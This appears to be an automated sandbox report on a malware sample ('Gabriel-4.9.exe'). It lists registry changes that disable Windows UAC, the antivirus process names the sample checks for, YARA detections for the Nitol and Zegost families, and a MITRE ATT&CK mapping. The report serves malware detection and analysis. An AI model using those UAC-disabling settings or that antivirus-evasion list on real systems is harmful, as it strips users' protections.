Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Code function: 0_2_00007FF746504D20 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00007FF746504D20

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_00000001800347B0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_00000001800347B0

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Code function: 0_2_00007FF746504260 HeapCreate,GetVersion,HeapSetInformation,

0_2_00007FF746504260

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to modify Windows User Account Control (UAC) settings

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemConsentPromptBehaviorAdminEnableLUAPromptOnSecureDesktop

30_2_06291B6D

Disable UAC(promptonsecuredesktop)

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

Registry value created: PromptOnSecureDesktop 0

Disables UAC (registry)

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: irsetup.exe, 00000002.00000002.4671579382.000000000261D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: irsetup.exe, 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: irsetup.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iusb3mon.exe PID: 4144, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Yara detected Zegost

Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: irsetup.exe PID: 3220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iusb3mon.exe PID: 4144, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Yara detected Zegost

Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.62505bf.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6290000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.iusb3mon.exe.6650607.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.irsetup.exe.54f05ff.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.2100560368.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680057945.0000000006250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680582416.0000000006650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.4680124112.0000000006290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\Microsoft\Program\ziliao.jpg, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	2 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Native API	1 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	121 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	4 Windows Service	1 Bypass User Account Control	3 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Valid Accounts	22 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Service Execution	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	2 PowerShell	RC Scripts	4 Windows Service	1 Bypass User Account Control	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
